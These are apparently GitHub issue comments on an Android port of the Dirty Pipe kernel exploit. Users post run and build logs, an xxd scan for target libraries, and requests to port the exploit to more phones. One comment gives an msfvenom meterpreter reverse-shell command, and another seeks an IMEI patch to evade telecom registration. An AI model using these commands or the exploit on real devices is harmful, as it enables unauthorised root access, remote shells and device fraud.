I came across the similar issue as Issue #11 when building kernel module, but the errors are "register_kprobe" and "unregister_kprobe" undefined. I have check the header file and found "linux/kprobes.h" was included.

I didn't modify and code in mymod.c so I have no idea why those errors occurred.

I want to run it on my old device of Huawei, its kernel version is 3.18.31.

Hello:
I want to add some demo for reading and writing files in mymod.c, such as filp_open and kernel_read_file. I used the./build/build.sh file in your document and found an error: "ERROR: modpost: "kernel_read_file" [../google-modules/mymod/mymod.ko] undefined!" 。

I don't have any driver development decompression, thank you!

I have a Verizon Pixel 6 and just successfully ran this. Is there any files I can modify as root to allow bootloader unlocking?

Hello, I am planning to reproduce the exploit on pixel 6. When running the exploit ,it prompts unsupported version,as show below:

I confirmed that in the libstagefright_soft_mp3dec.so at offset 0x1000, its value is 0x5f, as follows

Then I understand that I don't need to modify the offset of libc.so or the offset of vendor_file.

In theory, by simply erasing the version check in the exploit, I can successfully run the exploit on my pixel 6, right?

I just got this phone, and it has an unlockable bootloader, but when you unlock it, it wipes some keys from the TA partition (/dev/block/by-name/TA). So, I'd like to get root just so I can make an image of that partition before I unlock it at some later date. Does that lessen the amount of work needed for temp root?

I haven't applied the Android 12 update yet, in case I need to install a specific version.

Product=XQ-BQ62 Fingerprint=Sony/XQ-BQ62/XQ-BQ62:11/61.0.A.15.45/061000A015004501036498572:user/release-keys
Linux localhost 5.4.61-qgki-00383-g28c708f29a48 #1 SMP PREEMPT Tue Sep 28 20:31:15 JST 2021 aarch64

https://developer.sony.com/file/download/open-source-archive-for-61-0-a-15-45/

Results of the xxd and grep from the S22 ticket, cropped to those that match:

for i in vendor/lib/*.so; do echo $i; xxd $i | grep "001000: 5f" ; done
vendor/lib/libSForceVSE.so
00001000: 5f53 466f 7263 655f 4150 4450 3441 5044  _SForce_APDP4APD
vendor/lib/libacdbrtac.so
00001000: 5f5f 7562 7361 6e5f 6861 6e64 6c65 5f62  __ubsan_handle_b
vendor/lib/libadreno_utils.so
00001000: 5f6d 696e 5f6c 696e 655f 6f66 6673 6574  _min_line_offset
vendor/lib/libaudioalsa.so
00001000: 5f75 6273 616e 5f68 616e 646c 655f 6675  _ubsan_handle_fu
vendor/lib/libaudioconfigstore.so
00001000: 5f74 7265 6549 4e53 5f31 325f 5f76 616c  _treeINS_12__val
vendor/lib/libchilog.so
00001000: 5f70 6f73 6974 6976 655f 6d69 6e69 6d61  _positive_minima
vendor/lib/libcirrusspkrprot.so
00001000: 5f6d 696e 696d 616c 5f61 626f 7274 005f  _minimal_abort._
vendor/lib/libgpu_tonemapper.so
00001000: 5f00 5f5a 3230 656e 6769 6e65 5f64 656c  _._Z20engine_del
vendor/lib/libipebpsstriping.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libipebpsstriping170.so
00001000: 5f68 616e 646c 655f 6e75 6c6c 6162 696c  _handle_nullabil
vendor/lib/libjni_mfnrutil.so
00001000: 5f5f 7374 6163 6b5f 6368 6b5f 6661 696c  __stack_chk_fail
vendor/lib/libloc_socket.so
00001000: 5f31 3230 5f5f 7368 6172 6564 5f70 7472  _120__shared_ptr
vendor/lib/libmmcamera_lscv35.so
00001000: 5f75 7500 4373 7562 3634 5f73 7500 4373  _uu.Csub64_su.Cs
vendor/lib/libops.so
00001000: 5f61 626f 7274 005f 5f75 6273 616e 5f68  _abort.__ubsan_h

Hi, I have some doubts, why do we need to overwrite libstagefright_soft_mp3dec.so with the content of mymod.ko? Since we have tampered with /vendor/bin/modprobe, why not just execute finit_module(mymod.ko) and call the interface that closes SELINUX? What is the purpose of calling open(*.so) first?

Hi, here is my reprodued exploit on Pixel 6:

I noticed that we need to manually execute setenforce 0 after using magisk to escalate to ROOT.

But in mymod.c, I see that the KO file already has the code to set SELINUX to Permissive mode.

Why do we need to manually set setenforce to 0 when selinux is already set to permissive in the KO file?

Your documentation mentions Pixel 6, but from what I can tell you used a Pixel 6 Pro in your original exploit demo video.

Thanks.

I have a pixel 6 pro with an older security update. It's from 11-5-2021 and I was wondering if I can root the phone with this. The kernel version is "Linux localhost 5.10.43-android12-9-00001-g3b35c4eea2da-ab7739787 #1 SMP PREEMPT Thu Sep 16 20:17:47 UTC 2021 aarch64". I would have already tried however I don't know if its possible to brick the phone. Thanks

So I was looking through the patch notes for the latest (April 2022) security patch by Samsung and I found out that this vulnerability was patched which lead me to think that this vulnerability could be exploited on my device (Samsung Galaxy A20 - SM-A205F) as it has not been patched yet. I would love to help add support for my device and get this exploit working on my device.

Hi, I am trying to run on a Z Fold 3 using "libtriplecam_video_optical_zoom.so" and your beta-4 release from the S22 thread.

I am getting an error:

Offset found: shellcode_offset: a5fe0 hook_offset: 5cbbc first instruction: a9be7bfd
Empty space size: 32 bytes
Stage1 payload (344 bytes) is too large. Exit.

I am not sure which empty space it is trying to check, and if there is anything I can do about it

Have you tried replacing telnetd with meterpreter or a reverse shell?
msfvenom -p linux/aarch64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o met

any idea's on how to make magisk safely install and not brick the phone ?

Bootloader Unlock Unvisible
And Sim not Working also
Im from Pakistan Here Is An Other Issue for Other Countries Phones Is "Pakistan Telecommuting Authority" Tax
Any one Please help for Unlock BL **
Then i can Patch This Phone with Approved Imei by Pakistani phone...

Given this a few shots on a Pixel 6 device running SQ1D.220205.003 (8069835)
Needed to set the -f flag, even though the build should technically be fine with the version check

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 57.6 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 42.6 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 34.2 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 34.2 MB/s (14522684 bytes in 0.405s)
10 files pushed, 0 skipped. 33.5 MB/s (14588207 bytes in 0.415s)
Unsupported version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys

Full run logs

0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % ./run.sh
dirtypipe-android: 1 file pushed, 0 skipped. 61.7 MB/s (45400 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 59.4 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 44.5 MB/s (6899 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 36.6 MB/s (14522684 bytes in 0.379s)
10 files pushed, 0 skipped. 35.9 MB/s (14588207 bytes in 0.387s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=oriole Fingerprint=google/oriole/oriole:12/SQ1D.220205.003/8069835:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libstagefright_soft_mp3dec.so
Offset found: shellcode_offset: a2de0 hook_offset: 5a9dc first instruction: a9be7bfd
Empty space size: 544 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
It worked!
0xceb1d@MacBook-Pro dirtypipe-android-1.0.3 % adb shell
oriole:/ $ cd /data/local/tmp
oriole:/data/local/tmp $ ls
dirtypipe-android  dirtypipe-run-index  env-patcher  magisk  mylog2  root-log1  startup-root
oriole:/data/local/tmp $ cat root-log1
Successfully access log. Try=2
Start startup-root
Thu May 26 21:44:48 BST 2022: uid=0(root) gid=0(root) groups=0(root),3009(readproc) context=u:r:magisk:s0
oriole:/data/local/tmp $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),1078(ext_data_rw),1079(ext_obb_rw),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
oriole:/data/local/tmp $ su
Permission denied
13|oriole:/data/local/tmp $

└─$ make
aarch64-linux-android31-clang -Os -nostdlib -c -o stage2-c.o stage2-c.c
aarch64-linux-android31-clang -nostdlib -c -o stage2.o stage2.S
aarch64-linux-android31-clang -T stage2.lds -nostdlib -nostartfiles -static -o stage2 stage2-c.o stage2.o
echo -n "unsigned long stage2_libname_addr = 0x" > stage2-symbol.h
(nm stage2 | grep -e ' T libname'| cut -f 1 -d " " | tr -d $'\n'; echo "UL - 0x2000UL;") >> stage2-symbol.h || (rm stage2-symbol.h; false)
echo -n "unsigned long stage2_root_cmd_addr = 0x" >> stage2-symbol.h
(nm stage2 | grep -e ' T root_cmd'| cut -f 1 -d " " | tr -d $'\n'; echo "UL - 0x2000UL;") >> stage2-symbol.h || (rm stage2-symbol.h; false)
aarch64-linux-android31-clang -O2 -Os -c -o dirtypipe-android.o dirtypipe-android.c
aarch64-linux-android31-clang -O2 -Os -c -o elf-parser.o elf-parser.c
aarch64-linux-android31-clang -c -o stage1.o stage1.S
aarch64-linux-gnu-objcopy -O binary -j .text stage2 stage2.text
aarch64-linux-android31-clang -Os -nostartfiles -o modprobe-payload modprobe-payload.c -llog
modprobe-payload.c:49:24: warning: format specifies type 'int' but the argument has type 'long' [-Wformat]
LOGV("Parse: %d %d", root_cmd - cmdline, r - 1);
~~ ^~~~~~~~~~~~~~~~~~
%ld
modprobe-payload.c:24:79: note: expanded from macro 'LOGV'
#define LOGV(...) { __android_log_print(ANDROID_LOG_INFO, "modprobe-payload", VA_ARGS); }
^~~~~~~~~~~
1 warning generated.
llvm-strip modprobe-payload
make: *** No rule to make target '../../p6/kernel/out/android-gs-pixel-5.10/dist/mymod.ko', needed by 'mymod.ko'. Stop.

how to solve the problem tanks!

Hi, I tried to run the exploit on a Realme GT2 Pro without success.
I modified the run file, adding -f /vendor/lib/libdrmfs.so (one of the libraries with 0x5F at offset 0x1000), but the phone reboots.
This is the script output:

dirtypipe-android: 1 file pushed, 0 skipped. 87.7 MB/s (46184 bytes in 0.001s)
env-patcher: 1 file pushed, 0 skipped. 48.5 MB/s (13224 bytes in 0.000s)
startup-root: 1 file pushed, 0 skipped. 28.9 MB/s (6946 bytes in 0.000s)
magisk/: 7 files pushed, 0 skipped. 45.0 MB/s (14522684 bytes in 0.308s)
10 files pushed, 0 skipped. 44.2 MB/s (14589038 bytes in 0.315s)
Failed to set property 'a' to 'a'.
See dmesg for error reason.
Ignore device info.
Device version: Product=RMX3301 Fingerprint=realme/RMX3301EEA/RED8ACL1:12/SKQ1.211019.001/S.GDPR.202204141322:user/release-keys
stage1_lib: /system/lib64/libc++.so
stage2_lib: /system/lib/libldacBT_enc.so
stage2_param_libname: /vendor/lib/libdrmfs.so
d503233f PACIASP was found. Offset hook address by +4.
Offset found: shellcode_offset: a57d0 hook_offset: 5b264 first instruction: a9be7bfd
Empty space size: 2096 bytes
Run index: 0
Stage1 debug filename: /dev/.dirtypipe-0000
Shell code size: 344 0x158 bytes
startup script: /data/local/tmp/startup-root
It worked!

I think this is a problem with the included mymod.ko. Unfortunately Realme hasn't released yet the kernel sources. Do you think there's another way around?
Thank you.

Could this same method work on s22, i assume it woukd require mymod.ko be built in s22 kernel source but can it work

Hello, can this bug be used?https://www.venustech.com.cn/new_type/aqldfx/20210416/22626.html

Unsupported product: Product=NTH Fingerprint=HONOR/NTH-AN00/HNNTH:11/HONORNTH-AN00/4.2.0.108SP2C00:user/release-key

I know this exploit currently just adapts only on Google Pixel 6 and Realme GT2, I wonder is it possible to support Honor devices or if there's guidance to make it work?